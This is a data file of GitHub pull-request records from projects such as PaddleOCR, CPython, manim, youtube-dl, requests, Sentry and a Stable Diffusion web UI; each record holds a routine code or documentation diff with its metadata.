+加载预训练模型后,通过对现有模型的每个网络层进行敏感度分析,得到敏感度文件:sensitivities_0.data,可以通过PaddleSlim提供的[接口](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/paddleslim/prune/sensitive.py#L221)加载文件,获得各网络层在不同裁剪比例下的精度损失。从而了解各网络层冗余度,决定每个网络层的裁剪比例。
敏感度分析的具体细节见:[敏感度分析](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/tutorials/image_classification_sensitivity_analysis_tutorial.md)
+敏感度文件内容格式:
+ sensitivities_0.data(Dict){
+ 'layer_weight_name_0': sens_of_each_ratio(Dict){'pruning_ratio_0': acc_loss, 'pruning_ratio_1': acc_loss}
+ 'layer_weight_name_1': sens_of_each_ratio(Dict){'pruning_ratio_0': acc_loss, 'pruning_ratio_1': acc_loss}
+ }
+
+ 例子:
+ {
+ 'conv10_expand_weights': {0.1: 0.006509952684312718, 0.2: 0.01827734339798862, 0.3: 0.014528405644659832, 0.6: 0.06536008804270439, 0.8: 0.11798612250664964, 0.7: 0.12391408417493704, 0.4: 0.030615754498018757, 0.5: 0.047105205602406594}
+ 'conv10_linear_weights': {0.1: 0.05113190831455035, 0.2: 0.07705573833558801, 0.3: 0.12096721757739311, 0.6: 0.5135061352930738, 0.8: 0.7908166677143281, 0.7: 0.7272187676899062, 0.4: 0.1819252083008504, 0.5: 0.3728054727792405}
+ }
+加载敏感度文件后会返回一个字典,字典中的keys为网络模型参数模型的名字,values为一个字典,里面保存了相应网络层的裁剪敏感度信息。例如在例子中,conv10_expand_weights所对应的网络层在裁掉10%的卷积核后模型性能相较原模型会下降0.65%,详细信息可见[PaddleSlim](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/algo/algo.md#2-%E5%8D%B7%E7%A7%AF%E6%A0%B8%E5%89%AA%E8%A3%81%E5%8E%9F%E7%90%86)
进入PaddleOCR根目录,通过以下命令对模型进行敏感度分析训练:
```bash
@@ -42,7 +55,7 @@ python deploy/slim/prune/sensitivity_anal.py -c configs/det/det_mv3_db.yml -o Gl
```
### 4. 模型裁剪训练
-裁剪时通过之前的敏感度分析文件决定每个网络层的裁剪比例。在具体实现时,为了尽可能多的保留从图像中提取的低阶特征,我们跳过了backbone中靠近输入的4个卷积层。同样,为了减少由于裁剪导致的模型性能损失,我们通过之前敏感度分析所获得的敏感度表,挑选出了一些冗余较少,对裁剪较为敏感的[网络层](https://github.com/PaddlePaddle/PaddleOCR/blob/develop/deploy/slim/prune/pruning_and_finetune.py#L41),并在之后的裁剪过程中选择避开这些网络层。裁剪过后finetune的过程沿用OCR检测模型原始的训练策略。
+裁剪时通过之前的敏感度分析文件决定每个网络层的裁剪比例。在具体实现时,为了尽可能多的保留从图像中提取的低阶特征,我们跳过了backbone中靠近输入的4个卷积层。同样,为了减少由于裁剪导致的模型性能损失,我们通过之前敏感度分析所获得的敏感度表,人工挑选出了一些冗余较少,对裁剪较为敏感的[网络层](https://github.com/PaddlePaddle/PaddleOCR/blob/develop/deploy/slim/prune/pruning_and_finetune.py#L41)(指在较低的裁剪比例下就导致很高性能损失的网络层),并在之后的裁剪过程中选择避开这些网络层。裁剪过后finetune的过程沿用OCR检测模型原始的训练策略。
```bash
python deploy/slim/prune/pruning_and_finetune.py -c configs/det/det_mv3_db.yml -o Global.pretrain_weights=./deploy/slim/prune/pretrain_models/det_mv3_db/best_accuracy Global.test_batch_size_per_card=1
diff --git a/deploy/slim/prune/README_en.md b/deploy/slim/prune/README_en.md
index d854c10707..fee0b12f12 100644
--- a/deploy/slim/prune/README_en.md
+++ b/deploy/slim/prune/README_en.md
@@ -115,6 +115,7 @@ Compress results:
Generally, a more complex model would achive better performance in the task, but it also leads to some redundancy in the model. Model Pruning is a technique that reduces this redundancy by removing the sub-models in the neural network model, so as to reduce model calculation complexity and improve model inference performance.
This example uses PaddleSlim provided[APIs of Pruning](https://paddlepaddle.github.io/PaddleSlim/api/prune_api/) to compress the OCR model.
+PaddleSlim (GitHub: https://github.com/PaddlePaddle/PaddleSlim), an open source library which integrates model pruning, quantization (including quantization training and offline quantization), distillation, neural network architecture search, and many other commonly used and leading model compression technique in the industry.
It is recommended that you could understand following pages before reading this example,:
@@ -146,7 +147,20 @@ python setup.py install
## Pruning sensitivity analysis
- After the pre-training model is loaded, sensitivity analysis is performed on each network layer of the model to understand the redundancy of each network layer, thereby determining the pruning ratio of each network layer. For specific details of sensitivity analysis, see:[Sensitivity analysis](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/tutorials/image_classification_sensitivity_analysis_tutorial.md)
+ After the pre-training model is loaded, sensitivity analysis is performed on each network layer of the model to understand the redundancy of each network layer, and save a sensitivity file which named: sensitivities_0.data. After that, user could load the sensitivity file via the [methods provided by PaddleSlim](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/paddleslim/prune/sensitive.py#L221) and determining the pruning ratio of each network layer automatically. For specific details of sensitivity analysis, see:[Sensitivity analysis](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/tutorials/image_classification_sensitivity_analysis_tutorial.md)
+ The data format of sensitivity file:
+ sensitivities_0.data(Dict){
+ 'layer_weight_name_0': sens_of_each_ratio(Dict){'pruning_ratio_0': acc_loss, 'pruning_ratio_1': acc_loss}
+ 'layer_weight_name_1': sens_of_each_ratio(Dict){'pruning_ratio_0': acc_loss, 'pruning_ratio_1': acc_loss}
+ }
+
+ example:
+ {
+ 'conv10_expand_weights': {0.1: 0.006509952684312718, 0.2: 0.01827734339798862, 0.3: 0.014528405644659832, 0.6: 0.06536008804270439, 0.8: 0.11798612250664964, 0.7: 0.12391408417493704, 0.4: 0.030615754498018757, 0.5: 0.047105205602406594}
+ 'conv10_linear_weights': {0.1: 0.05113190831455035, 0.2: 0.07705573833558801, 0.3: 0.12096721757739311, 0.6: 0.5135061352930738, 0.8: 0.7908166677143281, 0.7: 0.7272187676899062, 0.4: 0.1819252083008504, 0.5: 0.3728054727792405}
+ }
+ The function would return a dict after loading the sensitivity file. The keys of the dict are name of parameters in each layer. And the value of key is the information about pruning sensitivity of correspoding layer. In example, pruning 10% filter of the layer corresponding to conv10_expand_weights would lead to 0.65% degradation of model performance. The details could be seen at: [Sensitivity analysis](https://github.com/PaddlePaddle/PaddleSlim/blob/develop/docs/zh_cn/algo/algo.md#2-%E5%8D%B7%E7%A7%AF%E6%A0%B8%E5%89%AA%E8%A3%81%E5%8E%9F%E7%90%86)
+
Enter the PaddleOCR root directory,perform sensitivity analysis on the model with the following command:
diff --git a/deploy/slim/quantization/README.md b/deploy/slim/quantization/README.md
index bf801d7133..b35761c649 100755
--- a/deploy/slim/quantization/README.md
+++ b/deploy/slim/quantization/README.md
@@ -3,7 +3,8 @@
复杂的模型有利于提高模型的性能,但也导致模型中存在一定冗余,模型量化将全精度缩减到定点数减少这种冗余,达到减少模型计算复杂度,提高模型推理性能的目的。
模型量化可以在基本不损失模型的精度的情况下,将FP32精度的模型参数转换为Int8精度,减小模型参数大小并加速计算,使用量化后的模型在移动端等部署时更具备速度优势。
-本教程将介绍如何使用PaddleSlim量化PaddleOCR的模型。
+本教程将介绍如何使用飞桨模型压缩库PaddleSlim做PaddleOCR模型的压缩。
+PaddleSlim(项目链接:https://github.com/PaddlePaddle/PaddleSlim)集成了模型剪枝、量化(包括量化训练和离线量化)、蒸馏和神经网络搜索等多种业界常用且领先的模型压缩功能,如果您感兴趣,可以关注并了解。
在开始本教程之前,建议先了解[PaddleOCR模型的训练方法](../../../doc/doc_ch/quickstart.md)以及[PaddleSlim](https://paddleslim.readthedocs.io/zh_CN/latest/index.html)
diff --git a/deploy/slim/quantization/README_en.md b/deploy/slim/quantization/README_en.md
index 4b8a2b23a2..69bd603a25 100755
--- a/deploy/slim/quantization/README_en.md
+++ b/deploy/slim/quantization/README_en.md
@@ -116,6 +116,7 @@ Compress results:
Generally, a more complex model would achive better performance in the task, but it also leads to some redundancy in the model. Quantization is a technique that reduces this redundancyby reducing the full precision data to a fixed number, so as to reduce model calculation complexity and improve model inference performance.
This example uses PaddleSlim provided [APIs of Quantization](https://paddlepaddle.github.io/PaddleSlim/api/quantization_api/) to compress the OCR model.
+PaddleSlim (GitHub: https://github.com/PaddlePaddle/PaddleSlim), an open source library which integrates model pruning, quantization (including quantization training and offline quantization), distillation, neural network architecture search, and many other commonly used and leading model compression technique in the industry.
It is recommended that you could understand following pages before reading this example,:
| https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/783 | 2020-09-21T08:02:54Z | 2020-09-21T12:54:59Z | 2020-09-21T12:54:59Z | 2020-09-21T12:54:59Z | 3,282 | PaddlePaddle/PaddleOCR | 42,615 |
|
[2.7] bpo-34631: Updated OpenSSL to 1.0.2s in Windows installer (GH-14161) | diff --git a/Misc/NEWS.d/next/Security/2019-06-17-08-43-19.bpo-34631.pJ8CGR.rst b/Misc/NEWS.d/next/Security/2019-06-17-08-43-19.bpo-34631.pJ8CGR.rst
new file mode 100644
index 00000000000000..41a972e9665aaf
--- /dev/null
+++ b/Misc/NEWS.d/next/Security/2019-06-17-08-43-19.bpo-34631.pJ8CGR.rst
@@ -0,0 +1 @@
+Updated OpenSSL to 1.0.2s in Windows installer
diff --git a/PCbuild/get_externals.bat b/PCbuild/get_externals.bat
index ed6a79f11db67f..f0a4b9946d86c7 100644
--- a/PCbuild/get_externals.bat
+++ b/PCbuild/get_externals.bat
@@ -47,7 +47,7 @@ rem files in both this dir and PC\VS9.0
set libraries=
set libraries=%libraries% bzip2-1.0.6
if NOT "%IncludeBsddb%"=="false" set libraries=%libraries% bsddb-4.7.25.0
-if NOT "%IncludeSSL%"=="false" set libraries=%libraries% openssl-1.0.2q
+if NOT "%IncludeSSL%"=="false" set libraries=%libraries% openssl-1.0.2s
set libraries=%libraries% sqlite-3.14.2.0
if NOT "%IncludeTkinter%"=="false" set libraries=%libraries% tcl-8.5.19.0
if NOT "%IncludeTkinter%"=="false" set libraries=%libraries% tk-8.5.19.0
diff --git a/PCbuild/python.props b/PCbuild/python.props
index 6673ff31368e49..b3dc1da3dffd5f 100644
--- a/PCbuild/python.props
+++ b/PCbuild/python.props
@@ -35,7 +35,7 @@
<sqlite3Dir>$(ExternalsDir)sqlite-3.14.2.0\</sqlite3Dir>
<bz2Dir>$(ExternalsDir)bzip2-1.0.6\</bz2Dir>
<bsddbDir>$(ExternalsDir)bsddb-4.7.25.0</bsddbDir>
- <opensslDir>$(ExternalsDir)openssl-1.0.2q\</opensslDir>
+ <opensslDir>$(ExternalsDir)openssl-1.0.2s\</opensslDir>
<opensslIncludeDir>$(opensslDir)include32</opensslIncludeDir>
<opensslIncludeDir Condition="'$(ArchName)' == 'amd64'">$(opensslDir)include64</opensslIncludeDir>
<nasmDir>$(ExternalsDir)\nasm-2.11.06\</nasmDir>
diff --git a/PCbuild/readme.txt b/PCbuild/readme.txt
index 556a8f25ca983d..ab4b6d0760a770 100644
--- a/PCbuild/readme.txt
+++ b/PCbuild/readme.txt
@@ -192,7 +192,7 @@ _bz2
Homepage:
http://www.bzip.org/
_ssl
- Python wrapper for version 1.0.2o of the OpenSSL secure sockets
+ Python wrapper for version 1.0.2s of the OpenSSL secure sockets
library, which is built by ssl.vcxproj
Homepage:
http://www.openssl.org/
| <!-- issue-number: [bpo-34631](https://bugs.python.org/issue34631) -->
https://bugs.python.org/issue34631
<!-- /issue-number -->
| https://api.github.com/repos/python/cpython/pulls/14161 | 2019-06-17T15:45:20Z | 2019-06-17T16:33:12Z | 2019-06-17T16:33:12Z | 2019-06-17T16:33:28Z | 830 | python/cpython | 3,824 |
Quaternions | diff --git a/active_projects/quaternions.py b/active_projects/quaternions.py
index 191ee42758..484e444792 100644
--- a/active_projects/quaternions.py
+++ b/active_projects/quaternions.py
@@ -4778,7 +4778,8 @@ class HypersphereStereographicProjection(SpecialThreeDScene):
[-1, 1, 0, 0],
[0, 0, 1, 1],
[0, 1, -1, 1],
- ]
+ ],
+ "unit_labels_scale_factor": 1,
}
def construct(self):
@@ -4827,6 +4828,7 @@ def update_label(label):
return label
label.add_updater(update_label)
+ self.pink_dot_label = label
def get_pq_point():
point = self.project_quaternion(q_tracker.get_value())
@@ -4841,9 +4843,12 @@ def get_pq_point():
def get_pq_line():
point = get_pq_point()
norm = get_norm(point)
+ origin = self.axes.coords_to_point(0, 0, 0)
if norm > dot_radius:
+ point -= origin
point *= (norm - dot_radius) / norm
- result = Line(ORIGIN, point)
+ point += origin
+ result = Line(origin, point)
result.set_stroke(width=1)
return result
@@ -5114,6 +5119,7 @@ def get_unit_labels(self):
labels = VGroup()
for tex, coords, vect in tex_coords_vects:
label = TexMobject(tex)
+ label.scale(self.unit_labels_scale_factor)
label.rotate(90 * DEGREES, RIGHT)
label.next_to(c2p(*coords), vect, SMALL_BUFF)
labels.add(label)
@@ -5333,10 +5339,12 @@ def setup_multiplier_tracker(self):
def add_unit_labels(self):
labels = self.unit_labels = self.get_unit_labels()
one_label = TexMobject("1")
+ one_label.scale(self.unit_labels_scale_factor)
one_label.set_shade_in_3d(True)
one_label.rotate(90 * DEGREES, RIGHT)
one_label.next_to(ORIGIN, IN + RIGHT, SMALL_BUFF)
- self.add(labels, one_label)
+ labels.add(one_label)
+ self.add(labels)
def show_multiplication_by_i_on_circle_1i(self):
m_tracker = self.multiplier_tracker
@@ -6420,27 +6428,95 @@ class QuaternionEndscreen(PatreonEndScreen):
}
-class Thumbnail(RuleOfQuaternionMultiplication):
+class ThumbnailP1(RuleOfQuaternionMultiplication):
CONFIG = {
"three_d_axes_config": {
"num_axis_pieces": 20,
- }
+ },
+ "unit_labels_scale_factor": 1.5,
+ "quaternion": [1, 0, 0, 0],
}
def construct(self):
self.setup_all_trackers()
- quat = normalize([-0.5, 0.5, -0.5, 0.5])
- self.multiplier_tracker.set_value(quat)
- self.q_tracker.set_value(quat)
- sphere = self.get_projected_sphere(0, solid=False)
- # self.specially_color_sphere(sphere)
- # sphere.set_fill(opacity=0.5)
- sphere.set_fill_by_checkerboard(BLUE_E, BLUE, opacity=0.8)
- for face in sphere:
+ self.remove(self.pink_dot_label)
+ q_tracker = self.q_tracker
+ m_tracker = self.multiplier_tracker
+
+ # quat = normalize([-0.5, 0.5, -0.5, 0.5])
+ quat = normalize(self.quaternion)
+ m_tracker.set_value(quat)
+ q_tracker.set_value(quat)
+ proj_sphere = self.get_projected_sphere(0, solid=False)
+ # self.specially_color_sphere(proj_sphere)
+ proj_sphere.set_color_by_gradient(
+ BLUE, YELLOW
+ )
+ proj_sphere.set_stroke(WHITE)
+ proj_sphere.set_fill(opacity=0.4)
+ for i, face in enumerate(proj_sphere):
+ alpha = i / len(proj_sphere)
+ opacity = 0.7 * (1 - there_and_back(alpha))
+ face.set_fill(opacity=opacity)
+
+ # unit_sphere = self.get_projected_sphere(0, quaternion=[1, 0, 0, 0], solid=False)
+ # self.specially_color_sphere(unit_sphere)
+ # unit_sphere.set_stroke(width=0)
+ # proj_sphere.set_fill_by_checkerboard(BLUE_E, BLUE, opacity=0.8)
+ for face in proj_sphere:
face.points = face.points[::-1]
+ max_r = np.max(np.apply_along_axis(get_norm, 1, face.points))
+ if max_r > 30:
+ face.fade(1)
+
+ for label in self.unit_labels:
+ label.set_shade_in_3d(False)
+ label.set_background_stroke(color=BLACK, width=2)
+
+ self.add(proj_sphere)
+ # self.add(unit_sphere)
+
+ for mobject in self.mobjects:
+ try:
+ mobject.shift(IN)
+ except ValueError:
+ pass
self.set_camera_orientation(
phi=70 * DEGREES,
theta=-110 * DEGREES,
)
- self.add(sphere)
+
+
+class ThumbnailP2(ThumbnailP1):
+ CONFIG = {
+ "quaternion": [0, 1, 0, 0],
+ }
+
+
+class ThumbnailOverlay(Scene):
+ def construct(self):
+ title = TextMobject("Quaternions")
+ title.set_width(8)
+ title.to_edge(UP)
+ v_line = Line(DOWN, UP)
+ v_line.set_height(FRAME_HEIGHT)
+
+ title.set_background_stroke(color=BLACK, width=1)
+
+ rect = BackgroundRectangle(title[4:6])
+ rect.set_fill(opacity=1)
+ rect.stretch(0.9, 0)
+ rect.stretch(1.1, 1)
+ title.add_to_back(BackgroundRectangle(title[0]))
+ title.add_to_back(rect)
+
+ arrow = Arrow(LEFT, RIGHT)
+ arrow.scale(1.5)
+ arrow.tip.scale(2)
+ arrow.set_stroke(width=10)
+ arrow.set_color(YELLOW)
+
+ self.add(v_line)
+ self.add(arrow)
+ self.add(title)
diff --git a/scene/three_d_scene.py b/scene/three_d_scene.py
index 133f6d8969..430de9fa10 100644
--- a/scene/three_d_scene.py
+++ b/scene/three_d_scene.py
@@ -74,9 +74,11 @@ def get_moving_mobjects(self, *animations):
return moving_mobjects
def add_fixed_orientation_mobjects(self, *mobjects, **kwargs):
+ self.add(*mobjects)
self.camera.add_fixed_orientation_mobjects(*mobjects, **kwargs)
def add_fixed_in_frame_mobjects(self, *mobjects):
+ self.add(*mobjects)
self.camera.add_fixed_in_frame_mobjects(*mobjects)
def remove_fixed_orientation_mobjects(self, *mobjects):
diff --git a/utils/space_ops.py b/utils/space_ops.py
index 07d8ea494b..821e86acc3 100644
--- a/utils/space_ops.py
+++ b/utils/space_ops.py
@@ -7,13 +7,46 @@
from functools import reduce
from utils.iterables import adjacent_pairs
-# Matrix operations
-
def get_norm(vect):
return sum([x**2 for x in vect])**0.5
+# Quaternions
+# TODO, implement quaternion type
+
+
+def quaternion_mult(q1, q2):
+ w1, x1, y1, z1 = q1
+ w2, x2, y2, z2 = q2
+ return np.array([
+ w1 * w2 - x1 * x2 - y1 * y2 - z1 * z2,
+ w1 * x2 + x1 * w2 + y1 * z2 - z1 * y2,
+ w1 * y2 + y1 * w2 + z1 * x2 - x1 * z2,
+ w1 * z2 + z1 * w2 + x1 * y2 - y1 * x2,
+ ])
+
+
+def quaternion_from_angle_axis(angle, axis):
+ return np.append(
+ np.cos(angle / 2),
+ np.sin(angle / 2) * normalize(axis)
+ )
+
+
+def quaternion_conjugate(quaternion):
+ result = np.array(quaternion)
+ result[1:] *= -1
+ return result
+
+
+def rotate_vector(vector, angle, axis=OUT):
+ quat = quaternion_from_angle_axis(angle, axis)
+ quat_inv = quaternion_conjugate(quat)
+ product = reduce(quaternion_mult, [quat, vector, quat_inv])
+ return product[1:]
+
+
def thick_diagonal(dim, thickness=2):
row_indices = np.arange(dim).repeat(dim).reshape((dim, dim))
col_indices = np.transpose(row_indices)
@@ -64,10 +97,6 @@ def z_to_vector(vector):
return np.dot(rotation_about_z(theta), phi_down)
-def rotate_vector(vector, angle, axis=OUT):
- return np.dot(rotation_matrix(angle, axis), vector)
-
-
def angle_between(v1, v2):
return np.arccos(np.dot(
v1 / get_norm(v1),
| https://api.github.com/repos/3b1b/manim/pulls/287 | 2018-09-10T18:38:59Z | 2018-09-10T18:39:05Z | 2018-09-10T18:39:05Z | 2018-09-10T18:39:05Z | 2,200 | 3b1b/manim | 18,197 |
|
[Dumpert] Add new extractor | diff --git a/youtube_dl/extractor/__init__.py b/youtube_dl/extractor/__init__.py
index a65c0c25b81..43bac0252bf 100644
--- a/youtube_dl/extractor/__init__.py
+++ b/youtube_dl/extractor/__init__.py
@@ -115,6 +115,7 @@
from .drtv import DRTVIE
from .dvtv import DVTVIE
from .dump import DumpIE
+from .dumpert import DumpertIE
from .defense import DefenseGouvFrIE
from .discovery import DiscoveryIE
from .divxstage import DivxStageIE
diff --git a/youtube_dl/extractor/dumpert.py b/youtube_dl/extractor/dumpert.py
new file mode 100644
index 00000000000..52d07deac00
--- /dev/null
+++ b/youtube_dl/extractor/dumpert.py
@@ -0,0 +1,47 @@
+# coding: utf-8
+from __future__ import unicode_literals
+
+import base64
+
+from .common import InfoExtractor
+
+
+class DumpertIE(InfoExtractor):
+ _VALID_URL = (r'https?://(?:www\.)?dumpert\.nl/mediabase/'
+ r'(?P<id>[0-9]+/[0-9a-zA-Z]+)/?.*')
+ _TEST = {
+ 'url': 'http://www.dumpert.nl/mediabase/6646981/951bc60f/',
+ 'md5': '1b9318d7d5054e7dcb9dc7654f21d643',
+ 'info_dict': {
+ 'id': '6646981/951bc60f',
+ 'ext': 'mp4',
+ 'title': 'Ik heb nieuws voor je',
+ 'description': 'Niet schrikken hoor'
+ }
+ }
+
+ def _real_extract(self, url):
+ video_id = self._match_id(url)
+ webpage = self._download_webpage(url, video_id)
+
+ title = self._html_search_meta('title', webpage)
+ description = self._html_search_meta('description', webpage)
+
+ files_base64 = self._html_search_regex(r'data-files="(.*?)"',
+ webpage,
+ 'files')
+ files_json = base64.b64decode(files_base64).decode('iso-8859-1')
+ files = self._parse_json(files_json, video_id)
+
+ format_names = ['flv', 'mobile', 'tablet', '720p']
+ formats = [{'format_id': name,
+ 'url': files[name].replace(r'\/', '/')}
+ for name in format_names
+ if name in files]
+
+ return {
+ 'id': video_id,
+ 'title': title,
+ 'description': description,
+ 'formats': formats
+ }
| Add support for the Dutch video site Dumpert. http://www.dumpert.nl/
| https://api.github.com/repos/ytdl-org/youtube-dl/pulls/5319 | 2015-03-29T21:44:32Z | 2015-03-30T14:12:37Z | 2015-03-30T14:12:37Z | 2019-09-29T18:44:07Z | 667 | ytdl-org/youtube-dl | 50,156 |
Remove unused module from tests | diff --git a/tests/test_requests.py b/tests/test_requests.py
index b0cb7d6b7e..b57056914d 100755
--- a/tests/test_requests.py
+++ b/tests/test_requests.py
@@ -20,7 +20,7 @@
Morsel, cookielib, getproxies, str, urlparse,
builtin_str, OrderedDict)
from requests.cookies import (
- cookiejar_from_dict, morsel_to_cookie, merge_cookies)
+ cookiejar_from_dict, morsel_to_cookie)
from requests.exceptions import (
ConnectionError, ConnectTimeout, InvalidSchema, InvalidURL,
MissingSchema, ReadTimeout, Timeout, RetryError, TooManyRedirects,
@@ -2293,4 +2293,3 @@ def test_parameters_for_nonstandard_schemes(self, input, params, expected):
r = requests.Request('GET', url=input, params=params)
p = r.prepare()
assert p.url == expected
-
diff --git a/tests/test_utils.py b/tests/test_utils.py
index 8d5ade9c8a..1edf6218c4 100644
--- a/tests/test_utils.py
+++ b/tests/test_utils.py
@@ -4,7 +4,7 @@
import pytest
from requests import compat
-from requests.cookies import RequestsCookieJar, cookiejar_from_dict
+from requests.cookies import RequestsCookieJar
from requests.structures import CaseInsensitiveDict
from requests.utils import (
address_in_network, dotted_netmask,
| merge_cookies and cookiejar_from_dict functions are already tested by other test functions. | https://api.github.com/repos/psf/requests/pulls/3809 | 2017-01-11T09:41:59Z | 2017-01-11T09:49:59Z | 2017-01-11T09:49:59Z | 2021-09-08T01:21:26Z | 321 | psf/requests | 32,338 |
fix(trace-view): Doing the TODO that was waiting on py 3.7+ | diff --git a/src/sentry/api/endpoints/organization_events_trace.py b/src/sentry/api/endpoints/organization_events_trace.py
index dc12081142437..38ec570f1e02f 100644
--- a/src/sentry/api/endpoints/organization_events_trace.py
+++ b/src/sentry/api/endpoints/organization_events_trace.py
@@ -1,5 +1,5 @@
import logging
-from collections import OrderedDict, defaultdict, deque
+from collections import defaultdict, deque
from typing import (
TYPE_CHECKING,
Any,
@@ -561,10 +561,7 @@ def serialize(
parent_map = self.construct_parent_map(transactions)
error_map = self.construct_error_map(errors)
parent_events: Dict[str, TraceEvent] = {}
- # TODO(3.7): Dictionary ordering in py3.6 is an implementation detail, using an OrderedDict because this way
- # we try to guarantee in py3.6 that the first item is the root. We can switch back to a normal dict when we're
- # on python 3.7.
- results_map: Dict[Optional[str], List[TraceEvent]] = OrderedDict()
+ results_map: Dict[Optional[str], List[TraceEvent]] = defaultdict(list)
to_check: Deque[SnubaTransaction] = deque()
# The root of the orphan tree we're currently navigating through
orphan_root: Optional[SnubaTransaction] = None
@@ -596,11 +593,7 @@ def serialize(
# Used to avoid removing the orphan from results entirely if we loop
orphan_root = current_event
- # not using a defaultdict here as a DefaultOrderedDict isn't worth the effort
- if parent_span_id in results_map:
- results_map[parent_span_id].append(previous_event)
- else:
- results_map[parent_span_id] = [previous_event]
+ results_map[parent_span_id].append(previous_event)
else:
current_event = to_check.popleft()
previous_event = parent_events[current_event["id"]]
| - Now that we're on py3.8 we know that dictionaries will be ordered,
  which means we can use the defaultdict and know that order is preserved (a quick illustrative sketch below)
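A minimal sketch of the dict-ordering guarantee being relied on (illustrative only; the key and value names are made up, not taken from the trace-view code):

```
from collections import defaultdict

results_map = defaultdict(list)
results_map["root-span"].append("txn A")    # first key inserted
results_map["child-span"].append("txn B")
results_map["root-span"].append("txn C")

# On Python 3.7+ plain dicts (and therefore defaultdict) preserve insertion
# order, so the first key inserted -- the trace root here -- iterates first.
assert list(results_map) == ["root-span", "child-span"]
```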
| https://api.github.com/repos/getsentry/sentry/pulls/29512 | 2021-10-22T14:59:30Z | 2021-10-25T15:57:03Z | 2021-10-25T15:57:03Z | 2021-11-10T00:01:36Z | 441 | getsentry/sentry | 44,175
Add host-t.com DNS API | diff --git a/README.md b/README.md
index 4ae14d3c20..042c560677 100644
--- a/README.md
+++ b/README.md
@@ -309,6 +309,7 @@ API | Description | Auth | HTTPS | CORS |
| [Glitterly](https://developers.glitterly.app) | Image generation API | `apiKey` | Yes | Yes |
| [Gorest](https://gorest.co.in/) | Online REST API for Testing and Prototyping | `OAuth` | Yes | Unknown |
| [Hexabin](https://hexabin.herokuapp.com/) | Convert and retrieve hexadecimal, binary, decimal, and octal values with ease | No | No | Unknown |
+| [host-t.com](https://host-t.com) | Basic DNS query via HTTP GET request | No | Yes | No |
| [Host.io](https://host.io) | Domains Data API for Developers | `apiKey` | Yes | Yes |
| [HTTP2.Pro](https://http2.pro/doc/api) | Test endpoints for client and server HTTP/2 protocol support | No | Yes | Unknown |
| [IBM Text to Speech](https://cloud.ibm.com/docs/text-to-speech/getting-started.html) | Convert text to speech | `apiKey` | Yes | Yes |
| <!-- Thank you for taking the time to work on a Pull Request for this project! -->
<!-- To ensure your PR is dealt with swiftly please check the following: -->
- [x] My submission is formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [x] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
| https://api.github.com/repos/public-apis/public-apis/pulls/1825 | 2021-07-06T08:54:24Z | 2021-07-21T01:25:54Z | 2021-07-21T01:25:54Z | 2021-07-21T01:25:55Z | 279 | public-apis/public-apis | 35,453 |
Add TAESD(or more) options for all the VAE encode/decode operation | diff --git a/modules/generation_parameters_copypaste.py b/modules/generation_parameters_copypaste.py
index 4e2865587a2..593abfef326 100644
--- a/modules/generation_parameters_copypaste.py
+++ b/modules/generation_parameters_copypaste.py
@@ -307,6 +307,12 @@ def parse_generation_parameters(x: str):
if "Schedule rho" not in res:
res["Schedule rho"] = 0
+ if "VAE Encoder" not in res:
+ res["VAE Encoder"] = "Full"
+
+ if "VAE Decoder" not in res:
+ res["VAE Decoder"] = "Full"
+
return res
@@ -332,6 +338,8 @@ def parse_generation_parameters(x: str):
('RNG', 'randn_source'),
('NGMS', 's_min_uncond'),
('Pad conds', 'pad_cond_uncond'),
+ ('VAE Encoder', 'sd_vae_encode_method'),
+ ('VAE Decoder', 'sd_vae_decode_method'),
]
diff --git a/modules/processing.py b/modules/processing.py
index ae58b108a41..43cb763feb1 100644
--- a/modules/processing.py
+++ b/modules/processing.py
@@ -16,6 +16,7 @@
import modules.sd_hijack
from modules import devices, prompt_parser, masking, sd_samplers, lowvram, generation_parameters_copypaste, extra_networks, sd_vae_approx, scripts, sd_samplers_common, sd_unet, errors
from modules.sd_hijack import model_hijack
+from modules.sd_samplers_common import images_tensor_to_samples, decode_first_stage, approximation_indexes
from modules.shared import opts, cmd_opts, state
import modules.shared as shared
import modules.paths as paths
@@ -30,7 +31,6 @@
from einops import repeat, rearrange
from blendmodes.blend import blendLayers, BlendType
-decode_first_stage = sd_samplers_common.decode_first_stage
# some of those options should not be changed at all because they would break the model, so I removed them from options.
opt_C = 4
@@ -84,7 +84,7 @@ def txt2img_image_conditioning(sd_model, x, width, height):
# The "masked-image" in this case will just be all zeros since the entire image is masked.
image_conditioning = torch.zeros(x.shape[0], 3, height, width, device=x.device)
- image_conditioning = sd_model.get_first_stage_encoding(sd_model.encode_first_stage(image_conditioning))
+ image_conditioning = images_tensor_to_samples(image_conditioning, approximation_indexes.get(opts.sd_vae_encode_method))
# Add the fake full 1s mask to the first dimension.
image_conditioning = torch.nn.functional.pad(image_conditioning, (0, 0, 0, 0, 1, 0), value=1.0)
@@ -203,7 +203,7 @@ def depth2img_image_conditioning(self, source_image):
midas_in = torch.from_numpy(transformed["midas_in"][None, ...]).to(device=shared.device)
midas_in = repeat(midas_in, "1 ... -> n ...", n=self.batch_size)
- conditioning_image = self.sd_model.get_first_stage_encoding(self.sd_model.encode_first_stage(source_image))
+ conditioning_image = images_tensor_to_samples(source_image*0.5+0.5, approximation_indexes.get(opts.sd_vae_encode_method))
conditioning = torch.nn.functional.interpolate(
self.sd_model.depth_model(midas_in),
size=conditioning_image.shape[2:],
@@ -216,7 +216,7 @@ def depth2img_image_conditioning(self, source_image):
return conditioning
def edit_image_conditioning(self, source_image):
- conditioning_image = self.sd_model.encode_first_stage(source_image).mode()
+ conditioning_image = images_tensor_to_samples(source_image*0.5+0.5, approximation_indexes.get(opts.sd_vae_encode_method))
return conditioning_image
@@ -795,6 +795,7 @@ def process_images_inner(p: StableDiffusionProcessing) -> Processed:
if getattr(samples_ddim, 'already_decoded', False):
x_samples_ddim = samples_ddim
else:
